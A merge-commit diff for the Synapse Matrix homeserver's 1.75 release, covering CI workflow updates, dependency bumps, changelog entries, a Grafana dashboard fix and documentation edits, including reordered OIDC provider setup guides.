Merge remote-tracking branch 'upstream/release-v1.75'

This commit is contained in:
Tulir Asokan 2023-01-19 15:42:39 +02:00
commit 2830d33724
148 changed files with 4230 additions and 2236 deletions

18
.flake8
View File

@ -1,18 +0,0 @@
# TODO: incorporate this into pyproject.toml if flake8 supports it in the future.
# See https://github.com/PyCQA/flake8/issues/234
[flake8]
# see https://pycodestyle.readthedocs.io/en/latest/intro.html#error-codes
# for error codes. The ones we ignore are:
# W503: line break before binary operator
# W504: line break after binary operator
# E203: whitespace before ':' (which is contrary to pep8?)
# E731: do not assign a lambda expression, use a def
# E501: Line too long (black enforces this for us)
#
# flake8-bugbear runs extra checks. Its error codes are described at
# https://github.com/PyCQA/flake8-bugbear#list-of-warnings
# B019: Use of functools.lru_cache or functools.cache on methods can lead to memory leaks
# B023: Functions defined inside a loop must not use variables redefined in the loop
# B024: Abstract base class with no abstract method.
ignore=W503,W504,E203,E731,E501,B019,B023,B024

View File

@ -6,7 +6,7 @@ on:
- reopened # For debugging!
permissions:
# Needed to be able to push the commit. See
# Needed to be able to push the commit. See
# https://docs.github.com/en/code-security/dependabot/working-with-dependabot/automating-dependabot-with-github-actions#enable-auto-merge-on-a-pull-request
# for a similar example
contents: write
@ -20,8 +20,11 @@ jobs:
with:
ref: ${{ github.event.pull_request.head.ref }}
- name: Write, commit and push changelog
env:
PR_TITLE: ${{ github.event.pull_request.title }}
PR_NUMBER: ${{ github.event.pull_request.number }}
run: |
echo "${{ github.event.pull_request.title }}." > "changelog.d/${{ github.event.pull_request.number }}".misc
echo "${PR_TITLE}." > "changelog.d/${PR_NUMBER}".misc
git add changelog.d
git config user.email "github-actions[bot]@users.noreply.github.com"
git config user.name "GitHub Actions"

View File

@ -14,7 +14,7 @@ jobs:
# There's a 'download artifact' action, but it hasn't been updated for the workflow_run action
# (https://github.com/actions/download-artifact/issues/60) so instead we get this mess:
- name: 📥 Download artifact
uses: dawidd6/action-download-artifact@e6e25ac3a2b93187502a8be1ef9e9603afc34925 # v2.24.2
uses: dawidd6/action-download-artifact@bd10f381a96414ce2b13a11bfa89902ba7cea07f # v2.24.3
with:
workflow: docs-pr.yaml
run_id: ${{ github.event.workflow_run.id }}

View File

@ -4,6 +4,8 @@ on:
pull_request:
paths:
- docs/**
- book.toml
- .github/workflows/docs-pr.yaml
jobs:
pages:
@ -32,3 +34,27 @@ jobs:
path: book
# We'll only use this in a workflow_run, then we're done with it
retention-days: 1
link-check:
name: Check links in documentation
runs-on: ubuntu-latest
steps:
- uses: actions/checkout@v2
- name: Setup mdbook
uses: peaceiris/actions-mdbook@adeb05db28a0c0004681db83893d56c0388ea9ea # v1.2.0
with:
mdbook-version: '0.4.17'
- name: Setup htmltest
run: |
wget https://github.com/wjdp/htmltest/releases/download/v0.17.0/htmltest_0.17.0_linux_amd64.tar.gz
echo '775c597ee74899d6002cd2d93076f897f4ba68686bceabe2e5d72e84c57bc0fb htmltest_0.17.0_linux_amd64.tar.gz' | sha256sum -c
tar zxf htmltest_0.17.0_linux_amd64.tar.gz
- name: Test links with htmltest
# Build the book with `./` as the site URL (to make checks on 404.html possible)
# Then run htmltest (without checking external links since that involves the network and is slow).
run: |
MDBOOK_OUTPUT__HTML__SITE_URL="./" mdbook build
./htmltest book --skip-external

View File

@ -58,7 +58,7 @@ jobs:
# Deploy to the target directory.
- name: Deploy to gh pages
uses: peaceiris/actions-gh-pages@de7ea6f8efb354206b205ef54722213d99067935 # v3.9.0
uses: peaceiris/actions-gh-pages@64b46b4226a4a12da2239ba3ea5aa73e3163c75b # v3.9.1
with:
github_token: ${{ secrets.GITHUB_TOKEN }}
publish_dir: ./book

View File

@ -208,7 +208,7 @@ jobs:
steps:
- uses: actions/checkout@v3
- uses: JasonEtco/create-an-issue@77399b6110ef82b94c1c9f9f615acf9e604f7f56 # v2.5.0, 2020-12-06
- uses: JasonEtco/create-an-issue@e27dddc79c92bc6e4562f268fffa5ed752639abd # v2.9.1
env:
GITHUB_TOKEN: ${{ secrets.GITHUB_TOKEN }}
with:

View File

@ -148,7 +148,7 @@ jobs:
env:
# Skip testing for platforms which various libraries don't have wheels
# for, and so need extra build deps.
CIBW_TEST_SKIP: pp39-* *i686* *musl* pp37-macosx*
CIBW_TEST_SKIP: pp3{7,9}-* *i686* *musl*
# Fix Rust OOM errors on emulated aarch64: https://github.com/rust-lang/cargo/issues/10583
CARGO_NET_GIT_FETCH_WITH_CLI: true
CIBW_ENVIRONMENT_PASS_LINUX: CARGO_NET_GIT_FETCH_WITH_CLI

View File

@ -53,7 +53,7 @@ jobs:
- run: scripts-dev/check_schema_delta.py --force-colors
lint:
uses: "matrix-org/backend-meta/.github/workflows/python-poetry-ci.yml@v1"
uses: "matrix-org/backend-meta/.github/workflows/python-poetry-ci.yml@v2"
with:
typechecking-extras: "all"

View File

@ -174,7 +174,7 @@ jobs:
steps:
- uses: actions/checkout@v3
- uses: JasonEtco/create-an-issue@77399b6110ef82b94c1c9f9f615acf9e604f7f56 # v2.5.0, 2020-12-06
- uses: JasonEtco/create-an-issue@e27dddc79c92bc6e4562f268fffa5ed752639abd # v2.9.1
env:
GITHUB_TOKEN: ${{ secrets.GITHUB_TOKEN }}
with:

1
.gitignore vendored
View File

@ -36,6 +36,7 @@ __pycache__/
# For direnv users
/.envrc
.direnv/
# IDEs
/.idea/

View File

@ -1,3 +1,113 @@
Synapse 1.75.0 (2023-01-17)
===========================
No significant changes since 1.75.0rc2.
Synapse 1.75.0rc2 (2023-01-12)
==============================
Bugfixes
--------
- Fix a bug introduced in Synapse 1.75.0rc1 where device lists could be miscalculated with some sync filters. ([\#14810](https://github.com/matrix-org/synapse/issues/14810))
- Fix race where calling `/members` or `/state` with an `at` parameter could fail for newly created rooms, when using multiple workers. ([\#14817](https://github.com/matrix-org/synapse/issues/14817))
Synapse 1.75.0rc1 (2023-01-10)
==============================
Features
--------
- Add a `cached` function to `synapse.module_api` that returns a decorator to cache return values of functions. ([\#14663](https://github.com/matrix-org/synapse/issues/14663))
- Add experimental support for [MSC3391](https://github.com/matrix-org/matrix-spec-proposals/pull/3391) (removing account data). ([\#14714](https://github.com/matrix-org/synapse/issues/14714))
- Support [RFC7636](https://datatracker.ietf.org/doc/html/rfc7636) Proof Key for Code Exchange for OAuth single sign-on. ([\#14750](https://github.com/matrix-org/synapse/issues/14750))
- Support non-OpenID compliant userinfo claims for subject and picture. ([\#14753](https://github.com/matrix-org/synapse/issues/14753))
- Improve performance of `/sync` when filtering all rooms, message types, or senders. ([\#14786](https://github.com/matrix-org/synapse/issues/14786))
- Improve performance of the `/hierarchy` endpoint. ([\#14263](https://github.com/matrix-org/synapse/issues/14263))
Bugfixes
--------
- Fix the *MAU Limits* section of the Grafana dashboard relying on a specific `job` name for the workers of a Synapse deployment. ([\#14644](https://github.com/matrix-org/synapse/issues/14644))
- Fix a bug introduced in Synapse 1.70.0 which could cause spurious `UNIQUE constraint failed` errors in the `rotate_notifs` background job. ([\#14669](https://github.com/matrix-org/synapse/issues/14669))
- Ensure stream IDs are always updated after caches get invalidated with workers. Contributed by Nick @ Beeper (@fizzadar). ([\#14723](https://github.com/matrix-org/synapse/issues/14723))
- Remove the unspecced `device` field from `/pushrules` responses. ([\#14727](https://github.com/matrix-org/synapse/issues/14727))
- Fix a bug introduced in Synapse 1.73.0 where the `picture_claim` configured under `oidc_providers` was unused (the default value of `"picture"` was used instead). ([\#14751](https://github.com/matrix-org/synapse/issues/14751))
- Unescape HTML entities in URL preview titles making use of oEmbed responses. ([\#14781](https://github.com/matrix-org/synapse/issues/14781))
- Disable sending confirmation email when 3pid is disabled. ([\#14725](https://github.com/matrix-org/synapse/issues/14725))
Improved Documentation
----------------------
- Declare support for Python 3.11. ([\#14673](https://github.com/matrix-org/synapse/issues/14673))
- Fix `target_memory_usage` being used in the description for the actual `cache_autotune` sub-option `target_cache_memory_usage`. ([\#14674](https://github.com/matrix-org/synapse/issues/14674))
- Move `email` to Server section in config file documentation. ([\#14730](https://github.com/matrix-org/synapse/issues/14730))
- Fix broken links in the Synapse documentation. ([\#14744](https://github.com/matrix-org/synapse/issues/14744))
- Add missing worker settings to shared configuration documentation. ([\#14748](https://github.com/matrix-org/synapse/issues/14748))
- Document using Twitter as a OAuth 2.0 authentication provider. ([\#14778](https://github.com/matrix-org/synapse/issues/14778))
- Fix Synapse 1.74 upgrade notes to correctly explain how to install pyICU when installing Synapse from PyPI. ([\#14797](https://github.com/matrix-org/synapse/issues/14797))
- Update link to towncrier in contribution guide. ([\#14801](https://github.com/matrix-org/synapse/issues/14801))
- Use `htmltest` to check links in the Synapse documentation. ([\#14743](https://github.com/matrix-org/synapse/issues/14743))
Internal Changes
----------------
- Faster remote room joins: stream the un-partial-stating of events over replication. ([\#14545](https://github.com/matrix-org/synapse/issues/14545), [\#14546](https://github.com/matrix-org/synapse/issues/14546))
- Use [ruff](https://github.com/charliermarsh/ruff/) instead of flake8. ([\#14633](https://github.com/matrix-org/synapse/issues/14633), [\#14741](https://github.com/matrix-org/synapse/issues/14741))
- Change `handle_new_client_event` signature so that a 429 does not reach clients on `PartialStateConflictError`, and internally retry when needed instead. ([\#14665](https://github.com/matrix-org/synapse/issues/14665))
- Remove dependency on jQuery on reCAPTCHA page. ([\#14672](https://github.com/matrix-org/synapse/issues/14672))
- Faster joins: make `compute_state_after_events` consistent with other state-fetching functions that take a `StateFilter`. ([\#14676](https://github.com/matrix-org/synapse/issues/14676))
- Add missing type hints. ([\#14680](https://github.com/matrix-org/synapse/issues/14680), [\#14681](https://github.com/matrix-org/synapse/issues/14681), [\#14687](https://github.com/matrix-org/synapse/issues/14687))
- Improve type annotations for the helper methods on a `CachedFunction`. ([\#14685](https://github.com/matrix-org/synapse/issues/14685))
- Check that the SQLite database file exists before porting to PostgreSQL. ([\#14692](https://github.com/matrix-org/synapse/issues/14692))
- Add `.direnv/` directory to .gitignore to prevent local state generated by the [direnv](https://direnv.net/) development tool from being committed. ([\#14707](https://github.com/matrix-org/synapse/issues/14707))
- Batch up replication requests to request the resyncing of remote users's devices. ([\#14716](https://github.com/matrix-org/synapse/issues/14716))
- If debug logging is enabled, log the `msgid`s of any to-device messages that are returned over `/sync`. ([\#14724](https://github.com/matrix-org/synapse/issues/14724))
- Change GHA CI job to follow best practices. ([\#14772](https://github.com/matrix-org/synapse/issues/14772))
- Switch to our fork of `dh-virtualenv` to work around an upstream Python 3.11 incompatibility. ([\#14774](https://github.com/matrix-org/synapse/issues/14774))
- Skip testing built wheels for PyPy 3.7 on Linux x86_64 as we lack new required dependencies in the build environment. ([\#14802](https://github.com/matrix-org/synapse/issues/14802))
### Dependabot updates
<details>
- Bump JasonEtco/create-an-issue from 2.8.1 to 2.8.2. ([\#14693](https://github.com/matrix-org/synapse/issues/14693))
- Bump anyhow from 1.0.66 to 1.0.68. ([\#14694](https://github.com/matrix-org/synapse/issues/14694))
- Bump blake2 from 0.10.5 to 0.10.6. ([\#14695](https://github.com/matrix-org/synapse/issues/14695))
- Bump serde_json from 1.0.89 to 1.0.91. ([\#14696](https://github.com/matrix-org/synapse/issues/14696))
- Bump serde from 1.0.150 to 1.0.151. ([\#14697](https://github.com/matrix-org/synapse/issues/14697))
- Bump lxml from 4.9.1 to 4.9.2. ([\#14698](https://github.com/matrix-org/synapse/issues/14698))
- Bump types-jsonschema from 4.17.0.1 to 4.17.0.2. ([\#14700](https://github.com/matrix-org/synapse/issues/14700))
- Bump sentry-sdk from 1.11.1 to 1.12.0. ([\#14701](https://github.com/matrix-org/synapse/issues/14701))
- Bump types-setuptools from 65.6.0.1 to 65.6.0.2. ([\#14702](https://github.com/matrix-org/synapse/issues/14702))
- Bump minimum PyYAML to 3.13. ([\#14720](https://github.com/matrix-org/synapse/issues/14720))
- Bump JasonEtco/create-an-issue from 2.8.2 to 2.9.1. ([\#14731](https://github.com/matrix-org/synapse/issues/14731))
- Bump towncrier from 22.8.0 to 22.12.0. ([\#14732](https://github.com/matrix-org/synapse/issues/14732))
- Bump isort from 5.10.1 to 5.11.4. ([\#14733](https://github.com/matrix-org/synapse/issues/14733))
- Bump attrs from 22.1.0 to 22.2.0. ([\#14734](https://github.com/matrix-org/synapse/issues/14734))
- Bump black from 22.10.0 to 22.12.0. ([\#14735](https://github.com/matrix-org/synapse/issues/14735))
- Bump sentry-sdk from 1.12.0 to 1.12.1. ([\#14736](https://github.com/matrix-org/synapse/issues/14736))
- Bump setuptools from 65.3.0 to 65.5.1. ([\#14738](https://github.com/matrix-org/synapse/issues/14738))
- Bump serde from 1.0.151 to 1.0.152. ([\#14758](https://github.com/matrix-org/synapse/issues/14758))
- Bump ruff from 0.0.189 to 0.0.206. ([\#14759](https://github.com/matrix-org/synapse/issues/14759))
- Bump pydantic from 1.10.2 to 1.10.4. ([\#14760](https://github.com/matrix-org/synapse/issues/14760))
- Bump gitpython from 3.1.29 to 3.1.30. ([\#14761](https://github.com/matrix-org/synapse/issues/14761))
- Bump pillow from 9.3.0 to 9.4.0. ([\#14762](https://github.com/matrix-org/synapse/issues/14762))
- Bump types-requests from 2.28.11.5 to 2.28.11.7. ([\#14763](https://github.com/matrix-org/synapse/issues/14763))
- Bump dawidd6/action-download-artifact from 2.24.2 to 2.24.3. ([\#14779](https://github.com/matrix-org/synapse/issues/14779))
- Bump peaceiris/actions-gh-pages from 3.9.0 to 3.9.1. ([\#14791](https://github.com/matrix-org/synapse/issues/14791))
- Bump types-pillow from 9.3.0.4 to 9.4.0.0. ([\#14792](https://github.com/matrix-org/synapse/issues/14792))
- Bump pyopenssl from 22.1.0 to 23.0.0. ([\#14793](https://github.com/matrix-org/synapse/issues/14793))
- Bump types-setuptools from 65.6.0.2 to 65.6.0.3. ([\#14794](https://github.com/matrix-org/synapse/issues/14794))
- Bump importlib-metadata from 4.2.0 to 6.0.0. ([\#14795](https://github.com/matrix-org/synapse/issues/14795))
- Bump ruff from 0.0.206 to 0.0.215. ([\#14796](https://github.com/matrix-org/synapse/issues/14796))
</details>
Synapse 1.74.0 (2022-12-20)
===========================

20
Cargo.lock generated
View File

@ -13,9 +13,9 @@ dependencies = [
[[package]]
name = "anyhow"
version = "1.0.66"
version = "1.0.68"
source = "registry+https://github.com/rust-lang/crates.io-index"
checksum = "216261ddc8289130e551ddcd5ce8a064710c0d064a4d2895c67151c92b5443f6"
checksum = "2cb2f989d18dd141ab8ae82f64d1a8cdd37e0840f73a406896cf5e99502fab61"
[[package]]
name = "arc-swap"
@ -37,9 +37,9 @@ checksum = "bef38d45163c2f1dde094a7dfd33ccf595c92905c8f8f4fdc18d06fb1037718a"
[[package]]
name = "blake2"
version = "0.10.5"
version = "0.10.6"
source = "registry+https://github.com/rust-lang/crates.io-index"
checksum = "b12e5fd123190ce1c2e559308a94c9bacad77907d4c6005d9e58fe1a0689e55e"
checksum = "46502ad458c9a52b69d4d4d32775c788b7a1b85e8bc9d482d92250fc0e3f8efe"
dependencies = [
"digest",
]
@ -323,18 +323,18 @@ checksum = "d29ab0c6d3fc0ee92fe66e2d99f700eab17a8d57d1c1d3b748380fb20baa78cd"
[[package]]
name = "serde"
version = "1.0.150"
version = "1.0.152"
source = "registry+https://github.com/rust-lang/crates.io-index"
checksum = "e326c9ec8042f1b5da33252c8a37e9ffbd2c9bef0155215b6e6c80c790e05f91"
checksum = "bb7d1f0d3021d347a83e556fc4683dea2ea09d87bccdf88ff5c12545d89d5efb"
dependencies = [
"serde_derive",
]
[[package]]
name = "serde_derive"
version = "1.0.150"
version = "1.0.152"
source = "registry+https://github.com/rust-lang/crates.io-index"
checksum = "42a3df25b0713732468deadad63ab9da1f1fd75a48a15024b50363f128db627e"
checksum = "af487d118eecd09402d70a5d72551860e788df87b464af30e5ea6a38c75c541e"
dependencies = [
"proc-macro2",
"quote",
@ -343,9 +343,9 @@ dependencies = [
[[package]]
name = "serde_json"
version = "1.0.89"
version = "1.0.91"
source = "registry+https://github.com/rust-lang/crates.io-index"
checksum = "020ff22c755c2ed3f8cf162dbb41a7268d934702f3ed3631656ea597e08fc3db"
checksum = "877c235533714907a8c2464236f5c4b2a17262ef1bd71f38f35ea592c8da6883"
dependencies = [
"itoa",
"ryu",

View File

@ -1008,8 +1008,7 @@
"mode": "absolute",
"steps": [
{
"color": "green",
"value": null
"color": "green"
},
{
"color": "red",
@ -1681,8 +1680,7 @@
"mode": "absolute",
"steps": [
{
"color": "green",
"value": null
"color": "green"
},
{
"color": "red",
@ -2533,8 +2531,7 @@
"mode": "absolute",
"steps": [
{
"color": "green",
"value": null
"color": "green"
},
{
"color": "red",
@ -11296,7 +11293,7 @@
"uid": "$datasource"
},
"editorMode": "code",
"expr": "synapse_admin_mau_max{instance=\"$instance\", job=~\"(hhs_)?synapse\"}",
"expr": "max(synapse_admin_mau_max{instance=\"$instance\"})",
"format": "time_series",
"interval": "",
"intervalFactor": 1,
@ -11310,7 +11307,7 @@
"uid": "$datasource"
},
"editorMode": "code",
"expr": "synapse_admin_mau_current{instance=\"$instance\", job=~\"(hhs_)?synapse\"}",
"expr": "max(synapse_admin_mau_current{instance=\"$instance\"})",
"hide": false,
"legendFormat": "Current",
"range": true,
@ -12760,6 +12757,6 @@
"timezone": "",
"title": "Synapse",
"uid": "000000012",
"version": 149,
"version": 150,
"weekStart": ""
}

18
debian/changelog vendored
View File

@ -1,3 +1,21 @@
matrix-synapse-py3 (1.75.0) stable; urgency=medium
* New Synapse release 1.75.0.
-- Synapse Packaging team <packages@matrix.org> Tue, 17 Jan 2023 11:36:02 +0000
matrix-synapse-py3 (1.75.0~rc2) stable; urgency=medium
* New Synapse release 1.75.0rc2.
-- Synapse Packaging team <packages@matrix.org> Thu, 12 Jan 2023 10:30:15 -0800
matrix-synapse-py3 (1.75.0~rc1) stable; urgency=medium
* New Synapse release 1.75.0rc1.
-- Synapse Packaging team <packages@matrix.org> Tue, 10 Jan 2023 12:18:27 +0000
matrix-synapse-py3 (1.74.0) stable; urgency=medium
* New Synapse release 1.74.0.

View File

@ -36,8 +36,10 @@ RUN env DEBIAN_FRONTEND=noninteractive apt-get install \
wget
# fetch and unpack the package
# We are temporarily using a fork of dh-virtualenv due to an incompatibility with Python 3.11, which ships with
# Debian sid. TODO: Switch back to upstream once https://github.com/spotify/dh-virtualenv/pull/354 has merged.
RUN mkdir /dh-virtualenv
RUN wget -q -O /dh-virtualenv.tar.gz https://github.com/spotify/dh-virtualenv/archive/refs/tags/1.2.2.tar.gz
RUN wget -q -O /dh-virtualenv.tar.gz https://github.com/matrix-org/dh-virtualenv/archive/refs/tags/matrixorg-2023010302.tar.gz
RUN tar -xv --strip-components=1 -C /dh-virtualenv -f /dh-virtualenv.tar.gz
# install its build deps. We do another apt-cache-update here, because we might

View File

@ -102,6 +102,8 @@ experimental_features:
{% endif %}
# Filtering /messages by relation type.
msc3874_enabled: true
# Enable removing account data support
msc3391_enabled: true
server_notices:
system_mxid_localpart: _server

View File

@ -5,7 +5,7 @@ use it, you must enable the account validity feature (under
`account_validity`) in Synapse's configuration.
To use it, you will need to authenticate by providing an `access_token`
for a server admin: see [Admin API](../usage/administration/admin_api).
for a server admin: see [Admin API](../usage/administration/admin_api/).
## Renew account

View File

@ -3,7 +3,7 @@
This API returns information about reported events.
To use it, you will need to authenticate by providing an `access_token`
for a server admin: see [Admin API](../usage/administration/admin_api).
for a server admin: see [Admin API](../usage/administration/admin_api/).
The api is:
```

View File

@ -6,7 +6,7 @@ Details about the format of the `media_id` and storage of the media in the file
are documented under [media repository](../media_repository.md).
To use it, you will need to authenticate by providing an `access_token`
for a server admin: see [Admin API](../usage/administration/admin_api).
for a server admin: see [Admin API](../usage/administration/admin_api/).
## List all media in a room

View File

@ -11,7 +11,7 @@ Note that Synapse requires at least one message in each room, so it will never
delete the last message in a room.
To use it, you will need to authenticate by providing an `access_token`
for a server admin: see [Admin API](../usage/administration/admin_api).
for a server admin: see [Admin API](../usage/administration/admin_api/).
The API is:

View File

@ -6,7 +6,7 @@ local users. The server administrator must be in the room and have permission to
invite users.
To use it, you will need to authenticate by providing an `access_token`
for a server admin: see [Admin API](../usage/administration/admin_api).
for a server admin: see [Admin API](../usage/administration/admin_api/).
## Parameters

View File

@ -5,7 +5,7 @@ server. There are various parameters available that allow for filtering and
sorting the returned list. This API supports pagination.
To use it, you will need to authenticate by providing an `access_token`
for a server admin: see [Admin API](../usage/administration/admin_api).
for a server admin: see [Admin API](../usage/administration/admin_api/).
**Parameters**
@ -400,7 +400,7 @@ sent to a room in a given timeframe. There are various parameters available
that allow for filtering and ordering the returned list. This API supports pagination.
To use it, you will need to authenticate by providing an `access_token`
for a server admin: see [Admin API](../usage/administration/admin_api).
for a server admin: see [Admin API](../usage/administration/admin_api/).
This endpoint mirrors the [Matrix Spec defined Messages API](https://spec.matrix.org/v1.1/client-server-api/#get_matrixclientv3roomsroomidmessages).

View File

@ -4,7 +4,7 @@ Returns information about all local media usage of users. Gives the
possibility to filter them by time and user.
To use it, you will need to authenticate by providing an `access_token`
for a server admin: see [Admin API](../usage/administration/admin_api).
for a server admin: see [Admin API](../usage/administration/admin_api/).
The API is:

View File

@ -1,7 +1,7 @@
# User Admin API
To use it, you will need to authenticate by providing an `access_token`
for a server admin: see [Admin API](../usage/administration/admin_api).
for a server admin: see [Admin API](../usage/administration/admin_api/).
## Query User Account

View File

@ -10,7 +10,7 @@ The necessary tools are:
- [black](https://black.readthedocs.io/en/stable/), a source code formatter;
- [isort](https://pycqa.github.io/isort/), which organises each file's imports;
- [flake8](https://flake8.pycqa.org/en/latest/), which can spot common errors; and
- [ruff](https://github.com/charliermarsh/ruff), which can spot common errors; and
- [mypy](https://mypy.readthedocs.io/en/stable/), a type checker.
Install them with:
@ -28,7 +28,7 @@ scripts-dev/lint.sh
It's worth noting that modern IDEs and text editors can run these tools
automatically on save. It may be worth looking into whether this
functionality is supported in your editor for a more convenient
development workflow. It is not, however, recommended to run `flake8` or `mypy`
development workflow. It is not, however, recommended to run `mypy`
on save as they take a while and can be very resource intensive.
## General rules

View File

@ -106,8 +106,8 @@ regarding Synapse's Admin API, which is used mostly by sysadmins and external
service developers.
Synapse's code style is documented [here](../code_style.md). Please follow
it, including the conventions for the [sample configuration
file](../code_style.md#configuration-file-format).
it, including the conventions for [configuration
options and documentation](../code_style.md#configuration-code-and-documentation-format).
We welcome improvements and additions to our documentation itself! When
writing new pages, please
@ -126,7 +126,7 @@ changes to the Rust code.
# 8. Test, test, test!
<a name="test-test-test"></a>
<a name="test-test-test" id="test-test-test"></a>
While you're developing and before submitting a patch, you'll
want to test your code.
@ -382,7 +382,7 @@ To prepare a Pull Request, please:
## Changelog
All changes, even minor ones, need a corresponding changelog / newsfragment
entry. These are managed by [Towncrier](https://github.com/hawkowl/towncrier).
entry. These are managed by [Towncrier](https://github.com/twisted/towncrier).
To create a changelog entry, make a new file in the `changelog.d` directory named
in the format of `PRnumber.type`. The type can be one of the following:
@ -424,8 +424,7 @@ chicken-and-egg problem.
There are two options for solving this:
1. Open the PR without a changelog file, see what number you got, and *then*
add the changelog file to your branch (see [Updating your pull
request](#updating-your-pull-request)), or:
add the changelog file to your branch, or:
1. Look at the [list of all
issues/PRs](https://github.com/matrix-org/synapse/issues?q=), add one to the

View File

@ -59,8 +59,8 @@ namespace (such as anything under `/_matrix/client` for example). It is strongly
recommended that modules register their web resources under the `/_synapse/client`
namespace.
The provided resource is a Python class that implements Twisted's [IResource](https://twistedmatrix.com/documents/current/api/twisted.web.resource.IResource.html)
interface (such as [Resource](https://twistedmatrix.com/documents/current/api/twisted.web.resource.Resource.html)).
The provided resource is a Python class that implements Twisted's [IResource](https://docs.twistedmatrix.com/en/stable/api/twisted.web.resource.IResource.html)
interface (such as [Resource](https://docs.twistedmatrix.com/en/stable/api/twisted.web.resource.Resource.html)).
Only one resource can be registered for a given path. If several modules attempt to
register a resource for the same path, the module that appears first in Synapse's
@ -82,4 +82,4 @@ the callback name as the argument name and the function as its value. A
`register_[...]_callbacks` method exists for each category.
Callbacks for each category can be found on their respective page of the
[Synapse documentation website](https://matrix-org.github.io/synapse).
[Synapse documentation website](https://matrix-org.github.io/synapse).

View File

@ -88,98 +88,41 @@ oidc_providers:
display_name_template: "{{ user.name }}"
```
### Dex
### Apple
[Dex][dex-idp] is a simple, open-source OpenID Connect Provider.
Although it is designed to help building a full-blown provider with an
external database, it can be configured with static passwords in a config file.
Configuring "Sign in with Apple" (SiWA) requires an Apple Developer account.
Follow the [Getting Started guide](https://dexidp.io/docs/getting-started/)
to install Dex.
You will need to create a new "Services ID" for SiWA, and create and download a
private key with "SiWA" enabled.
Edit `examples/config-dev.yaml` config file from the Dex repo to add a client:
As well as the private key file, you will need:
* Client ID: the "identifier" you gave the "Services ID"
* Team ID: a 10-character ID associated with your developer account.
* Key ID: the 10-character identifier for the key.
[Apple's developer documentation](https://help.apple.com/developer-account/?lang=en#/dev77c875b7e)
has more information on setting up SiWA.
The synapse config will look like this:
```yaml
staticClients:
- id: synapse
secret: secret
redirectURIs:
- '[synapse public baseurl]/_synapse/client/oidc/callback'
name: 'Synapse'
```
Run with `dex serve examples/config-dev.yaml`.
Synapse config:
```yaml
oidc_providers:
- idp_id: dex
idp_name: "My Dex server"
skip_verification: true # This is needed as Dex is served on an insecure endpoint
issuer: "http://127.0.0.1:5556/dex"
client_id: "synapse"
client_secret: "secret"
scopes: ["openid", "profile"]
- idp_id: apple
idp_name: Apple
issuer: "https://appleid.apple.com"
client_id: "your-client-id" # Set to the "identifier" for your "ServicesID"
client_auth_method: "client_secret_post"
client_secret_jwt_key:
key_file: "/path/to/AuthKey_KEYIDCODE.p8" # point to your key file
jwt_header:
alg: ES256
kid: "KEYIDCODE" # Set to the 10-char Key ID
jwt_payload:
iss: TEAMIDCODE # Set to the 10-char Team ID
scopes: ["name", "email", "openid"]
authorization_endpoint: https://appleid.apple.com/auth/authorize?response_mode=form_post
user_mapping_provider:
config:
localpart_template: "{{ user.name }}"
display_name_template: "{{ user.name|capitalize }}"
```
### Keycloak
[Keycloak][keycloak-idp] is an opensource IdP maintained by Red Hat.
Keycloak supports OIDC Back-Channel Logout, which sends logout notification to Synapse, so that Synapse users get logged out when they log out from Keycloak.
This can be optionally enabled by setting `backchannel_logout_enabled` to `true` in the Synapse configuration, and by setting the "Backchannel Logout URL" in Keycloak.
Follow the [Getting Started Guide](https://www.keycloak.org/getting-started) to install Keycloak and set up a realm.
1. Click `Clients` in the sidebar and click `Create`
2. Fill in the fields as below:
| Field | Value |
|-----------|-----------|
| Client ID | `synapse` |
| Client Protocol | `openid-connect` |
3. Click `Save`
4. Fill in the fields as below:
| Field | Value |
|-----------|-----------|
| Client ID | `synapse` |
| Enabled | `On` |
| Client Protocol | `openid-connect` |
| Access Type | `confidential` |
| Valid Redirect URIs | `[synapse public baseurl]/_synapse/client/oidc/callback` |
| Backchannel Logout URL (optional) | `[synapse public baseurl]/_synapse/client/oidc/backchannel_logout` |
| Backchannel Logout Session Required (optional) | `On` |
5. Click `Save`
6. On the Credentials tab, update the fields:
| Field | Value |
|-------|-------|
| Client Authenticator | `Client ID and Secret` |
7. Click `Regenerate Secret`
8. Copy Secret
```yaml
oidc_providers:
- idp_id: keycloak
idp_name: "My KeyCloak server"
issuer: "https://127.0.0.1:8443/realms/{realm_name}"
client_id: "synapse"
client_secret: "copy secret generated from above"
scopes: ["openid", "profile"]
user_mapping_provider:
config:
localpart_template: "{{ user.preferred_username }}"
display_name_template: "{{ user.name }}"
backchannel_logout_enabled: true # Optional
email_template: "{{ user.email }}"
```
### Auth0
@ -262,285 +205,43 @@ oidc_providers:
display_name_template: "{{ user.preferred_username|capitalize }}" # TO BE FILLED: If your users have names in Authentik and you want those in Synapse, this should be replaced with user.name|capitalize.
```
### LemonLDAP
### Dex
[LemonLDAP::NG][lemonldap] is an open-source IdP solution.
[Dex][dex-idp] is a simple, open-source OpenID Connect Provider.
Although it is designed to help building a full-blown provider with an
external database, it can be configured with static passwords in a config file.
1. Create an OpenID Connect Relying Parties in LemonLDAP::NG
2. The parameters are:
- Client ID under the basic menu of the new Relying Parties (`Options > Basic >
Client ID`)
- Client secret (`Options > Basic > Client secret`)
- JWT Algorithm: RS256 within the security menu of the new Relying Parties
(`Options > Security > ID Token signature algorithm` and `Options > Security >
Access Token signature algorithm`)
- Scopes: OpenID, Email and Profile
- Allowed redirection addresses for login (`Options > Basic > Allowed
redirection addresses for login` ) :
`[synapse public baseurl]/_synapse/client/oidc/callback`
Follow the [Getting Started guide](https://dexidp.io/docs/getting-started/)
to install Dex.
Edit `examples/config-dev.yaml` config file from the Dex repo to add a client:
Synapse config:
```yaml
oidc_providers:
- idp_id: lemonldap
idp_name: lemonldap
discover: true
issuer: "https://auth.example.org/" # TO BE FILLED: replace with your domain
client_id: "your client id" # TO BE FILLED
client_secret: "your client secret" # TO BE FILLED
scopes:
- "openid"
- "profile"
- "email"
user_mapping_provider:
config:
localpart_template: "{{ user.preferred_username }}}"
# TO BE FILLED: If your users have names in LemonLDAP::NG and you want those in Synapse, this should be replaced with user.name|capitalize or any valid filter.
display_name_template: "{{ user.preferred_username|capitalize }}"
staticClients:
- id: synapse
secret: secret
redirectURIs:
- '[synapse public baseurl]/_synapse/client/oidc/callback'
name: 'Synapse'
```
### GitHub
[GitHub][github-idp] is a bit special as it is not an OpenID Connect compliant provider, but
just a regular OAuth2 provider.
The [`/user` API endpoint](https://developer.github.com/v3/users/#get-the-authenticated-user)
can be used to retrieve information on the authenticated user. As the Synapse
login mechanism needs an attribute to uniquely identify users, and that endpoint
does not return a `sub` property, an alternative `subject_claim` has to be set.
1. Create a new OAuth application: [https://github.com/settings/applications/new](https://github.com/settings/applications/new).
